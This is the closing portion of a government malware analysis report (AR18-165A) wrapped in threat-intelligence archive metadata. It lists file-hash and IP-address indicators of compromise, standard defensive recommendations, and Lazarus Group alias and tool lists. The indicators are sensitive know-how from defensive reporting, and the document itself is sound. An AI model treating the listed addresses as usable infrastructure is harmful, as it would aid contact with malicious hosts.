3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n3c809a1010... Contained_Within 546dbd370a40c8e46f9b599a414f25000eec5ae6b3e046a035fe6e6cd5d874e1\r\n3c809a1010... Connected_To 184.107.209.2\r\n3c809a1010... Connected_To 111.207.78.204\r\n3c809a1010... Connected_To 80.91.118.45\r\n3c809a1010... Connected_To 181.119.19.56\r\nc9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef\r\ne088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777\r\n20abb95114... Connected_To 98.101.211.162\r\n20abb95114... Connected_To 81.0.213.173\r\n98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64\r\n184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\n181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 39 of 40\n\n59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6\r\nRecommendations\r\nCISA would like to remind users and administrators to consider using the following best practices to strengthen the security\r\nposture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate ACLs.\r\nAdditional information on malware incident prevention and handling can be found in NIST's Special Publication 800-83,\r\nGuide to Malware Incident Prevention \u0026 Handling for Desktops and Laptops.\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. To request\r\nadditional analysis, please contact US-CERT and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact US-CERT and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or contact@mail.cisa.dhs.gov .\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.us-cert.gov.\r\nSource: https://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nhttps://www.us-cert.gov/ncas/analysis-reports/AR18-165A\r\nPage 40 of 40", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA" ], "references": [ "https://www.us-cert.gov/ncas/analysis-reports/AR18-165A" ], "report_names": [ "AR18-165A" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434669, "ts_updated_at": 1775792299, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.pdf", "text": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.txt", "img": "https://archive.orkl.eu/434235d6dfc72720cff0494511abdc0d5b214426.jpg" } }